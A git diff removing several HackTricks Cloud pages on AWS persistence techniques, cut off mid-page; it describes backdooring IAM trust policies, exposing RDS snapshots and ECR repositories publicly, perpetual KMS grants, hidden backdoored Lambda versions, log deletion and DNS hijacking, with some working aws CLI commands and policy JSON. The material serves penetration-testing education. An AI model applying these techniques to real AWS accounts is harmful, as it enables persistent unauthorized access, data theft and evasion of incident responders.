-{% endhint %} - -## EC2 - -For more information check: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -### Security Group Connection Tracking Persistence - -If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. - -If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** - -### EC2 Lifecycle Manager - -This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ -An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. - -### Scheduled Instances - -It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. - -### Spot Fleet Request - -Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. - -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) -* Backdooring the **User Data** - -### **Backdoor Launch Configuration** - -* Backdoor the used AMI -* Backdoor the User Data -* Backdoor the Key Pair - -### VPN - -Create a VPN so the attacker will be able to connect directly through i to the VPC. - -### VPC Peering - -Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md deleted file mode 100644 index cdea71f8d..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md +++ /dev/null @@ -1,124 +0,0 @@ -# AWS - ECR Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECR - -For more information check: - -{% content-ref url="../aws-services/aws-ecr-enum.md" %} -[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) -{% endcontent-ref %} - -### Hidden Docker Image with Malicious Code - -An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. - -### Repository Policy - -Add a policy to a single repository granting yourself (or everybody) access to a repository: - -```bash -aws ecr set-repository-policy \ - --repository-name cluster-autoscaler \ - --policy-text file:///tmp/my-policy.json - -# With a .json such as - -{ - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] -} -``` - -{% hint style="warning" %} -Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. -{% endhint %} - -### Registry Policy & Cross-account Replication - -It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. - -
- -First, you need to give the external account access over the registry with a **registry policy** like: - -```bash -aws ecr put-registry-policy --policy-text file://my-policy.json - -# With a .json like: - -{ - "Sid": "asdasd", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::947247140022:root" - }, - "Action": [ - "ecr:CreateRepository", - "ecr:ReplicateImage" - ], - "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" -} -``` - -Then apply the replication config: - -```bash -aws ecr put-replication-configuration \ - --replication-configuration file://replication-settings.json \ - --region us-west-2 - -# Having the .json a content such as: -{ - "rules": [{ - "destinations": [{ - "region": "destination_region", - "registryId": "destination_accountId" - }], - "repositoryFilters": [{ - "filter": "repository_prefix_name", - "filterType": "PREFIX_MATCH" - }] - }] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md deleted file mode 100644 index b534c2fd2..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - EFS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EFS - -For more information check: - -{% content-ref url="../aws-services/aws-efs-enum.md" %} -[aws-efs-enum.md](../aws-services/aws-efs-enum.md) -{% endcontent-ref %} - -### Modify Resource Policy / Security Groups - -Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. - -### Create Access Point - -You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md deleted file mode 100644 index accebf399..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md +++ /dev/null @@ -1,78 +0,0 @@ -# AWS - IAM Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -For more information access: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -### Common IAM Persistence - -* Create a user -* Add a controlled user to a privileged group -* Create access keys (of the new user or of all users) -* Grant extra permissions to controlled users/groups (attached policies or inline policies) -* Disable MFA / Add you own MFA device -* Create a Role Chain Juggling situation (more on this below in STS persistence) - -### Backdoor Role Trust Policies - -You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": [ - "*", - "arn:aws:iam::123213123123:root" - ] - }, - "Action": "sts:AssumeRole" - } - ] -} -``` - -### Backdoor Policy Version - -Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. - -### Backdoor / Create Identity Provider - -If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md deleted file mode 100644 index dbf4efa29..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md +++ /dev/null @@ -1,66 +0,0 @@ -# AWS - KMS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For mor information check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### Grant acces via KMS policies - -An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. - -### Eternal Grant - -Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. - -Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. - -(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) - -```bash -# To generate grants, generate 10 like this one -aws kms create-grant \ - --key-id \ - --grantee-principal \ - --operations "CreateGrant" "Decrypt" - -# To monitor grants -aws kms list-grants --key-id -``` - -{% hint style="info" %} -A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md deleted file mode 100644 index 13f2777a8..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md +++ /dev/null @@ -1,90 +0,0 @@ -# AWS - Lambda Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda - -For more information check: - -{% content-ref url="../../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} - -### Lambda Layer Persistence - -It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: - -{% content-ref url="aws-lambda-layers-persistence.md" %} -[aws-lambda-layers-persistence.md](aws-lambda-layers-persistence.md) -{% endcontent-ref %} - -### Lambda Extension Persistence - -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. - -{% content-ref url="aws-abusing-lambda-extensions.md" %} -[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md) -{% endcontent-ref %} - -### Via resource policies - -It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: - -
- -### Versions, Aliases & Weights - -A Lambda can have **different versions** (with different code each version).\ -Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ -This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. - -
- -### Version Backdoor + API Gateway - -1. Copy the original code of the Lambda -2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST - 1. Call the API gateway related to the lambda to execute the code -3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. - 1. This will hide the backdoored code in a previous version -4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` - 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). -5. Select the POST method created and in Actions select **`Deploy API`** -6. Now, when you **call the function via POST your Backdoor** will be invoked - -### Cron/Event actuator - -The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ -Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. - -* Every time a new user is created lambda generates a new user key and send it to the attacker. -* Every time a new role is created lambda gives assume role permissions to compromised users. -* Every time new cloudtrail logs are generated, delete/alter them - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md deleted file mode 100644 index aa8a0269f..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md +++ /dev/null @@ -1,69 +0,0 @@ -# AWS - Abusing Lambda Extensions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda Extensions - -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. - -* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. - -For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). - -### External Extension for Persistence, Stealing Requests & modifying Requests - -This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) - -It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process\_vm\_readv**” and “**process\_vm\_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.** - -Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. - -The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. - -

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

- -The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. - -{% hint style="warning" %} -By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. -{% endhint %} - -Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. - -

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

- -The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. - -## References - -* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) -* [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md deleted file mode 100644 index 77290eacb..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md +++ /dev/null @@ -1,59 +0,0 @@ -# AWS - Lightsail Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lightsail - -For more information check: - -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} - -### Download Instance SSH keys & DB passwords - -They won't be changed probably so just having them is a good option for persistence - -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** -* Expose a port with port knocking with a backdoor - -### DNS persistence - -If domains are configured: - -* Create a subdomain pointing your IP so you will have a **subdomain takeover** -* Create **SPF** record allowing you to send **emails** from the domain -* Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md deleted file mode 100644 index 641621662..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md +++ /dev/null @@ -1,61 +0,0 @@ -# AWS - RDS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## RDS - -For more information check: - -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} - -### Make instance publicly accessible: `rds:ModifyDBInstance` - -An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. - -{% code overflow="wrap" %} -```bash -aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately -``` -{% endcode %} - -### Create an admin user inside the DB - -An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. - -### Make snapshot public - -{% code overflow="wrap" %} -```bash -aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md deleted file mode 100644 index c821dbd6a..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# AWS - S3 Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
